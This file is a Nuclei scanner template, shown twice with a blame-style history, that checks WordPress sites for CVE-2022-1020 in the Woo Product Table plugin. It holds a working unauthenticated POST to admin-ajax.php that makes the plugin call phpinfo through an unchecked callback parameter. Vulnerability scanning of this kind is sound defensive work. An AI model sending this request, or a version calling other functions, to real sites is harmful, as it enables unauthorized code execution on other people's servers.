nuclei-templates/cves/2022/CVE-2022-1020.yaml

id: CVE-2022-1020

info:
  name: Woo Product Table < 3.1.2 - Unauthenticated Arbitrary Function Call
  author: Akincibor
  severity: high
  description: The plugin does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.
  reference:
    - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1020
  tags: wp,wp-plugin,wordpress,cve,cve2022,unauth

requests:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option_key=a&perpose=update&callback=phpinfo

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
Create CVE-2022-1020.yaml 2022-04-20 22:47:29 +00:00			`id: CVE-2022-1020`

			`info:`
			`name: Woo Product Table < 3.1.2 - Unauthenticated Arbitrary Function Call`
			`author: Akincibor`
			`severity: high`
			`description: The plugin does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.`
			`reference:`
			`- https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-1020`
			`tags: wp,wp-plugin,wordpress,cve,cve2022,unauth`

			`requests:`
Update CVE-2022-1020.yaml 2022-04-22 13:20:27 +00:00			`- raw:`
			`- \|`
			`POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`option_key=a&perpose=update&callback=phpinfo`
Create CVE-2022-1020.yaml 2022-04-20 22:47:29 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "PHP Extension"`
			`- "PHP Version"`
			`condition: and`

			`- type: status`
			`status:`
			`- 200`

			`extractors:`
			`- type: regex`
			`part: body`
			`group: 1`
			`regex:`
			`- '>PHP Version <\/td><td class="v">([0-9.]+)'`